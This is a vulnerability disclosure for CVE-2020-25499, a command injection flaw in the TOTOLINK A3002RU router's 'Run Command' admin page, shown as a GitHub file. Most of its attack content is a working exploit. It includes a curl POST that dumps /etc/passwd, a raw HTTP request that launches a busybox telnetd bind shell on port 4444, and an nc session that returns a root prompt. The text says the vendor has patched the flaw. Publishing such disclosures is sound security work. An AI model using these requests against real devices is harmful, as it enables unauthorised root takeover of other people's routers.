Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
================================================================================================================================================
TOTOLINK A3002RU-V2.0.0 B20190814.1034 allows authenticated remote
users to modify the system's 'Run Command'.
Also vulnerabilities is more dangerous when router uses remote management function
through the public-facing IP address on the WAN port.
Attackers can send prepared POST request to device during administrator
session is active and also got rce, because in request doesn't requires any
authenticated token or cookies.
An attacker can use this functionality to execute arbitrary OS commands
on the router. There is also possibility to get shell command with root priviledge on device.
Administrator must login to administrator panel and go to
Advanced Setup-> System->Run Command.
There is possibility to run ping and traceroute but it is also possible
to change it and run different os command.
Or Attacker need to send the request to router during admin session.
If You like to use curl:
- Send command:
curl -d "submit-url=%2Fsyscmd.htm&sysCmd=cat+/etc/passwd" -X POST http://192.168.1.1/boafrm/formSysCmd
- Get response:
curl http://192.168.1.1/syscmd.htm
...
root:x:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null
...
On router is busybox module so if run command to get bind shell on port 4444:
'/bin/busybox telnetd -l/bin/sh -p4444'
----------------------------------------------------------------------------
POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Upgrade-Insecure-Requests: 1
submit-url=%2Fsyscmd.htm&sysCmd=/bin/busybox+telnetd+-l/bin/sh+-p4444
-----------------------------------------------------------------------------
Will get open port 4444 which is listening for connections.
So when connect to this port using nc will get a shell with
root priviledge on router.
------------------------------
# nc 192.168.1.1 4444
��echo $USER
echo $USER
root
# cat /proc/version
cat /proc/version
Linux version 3.10.90 (admin@hasee1.hopeiot) (gcc version 4.4.7 (Realtek MSDK-4.4.7 Build 2001) ) #2201 Wed Aug 14 10:38:28 CST 2019
#
------------------------------
The producer and cve.mitre.org was announced 9.09.2020 and new version of firmware is available.
The Producer confirm patched this voulnerability.
https://www.totolink.net/home/index/newsss/id/196.html
CVE-2020-25499
================================================================================================================================================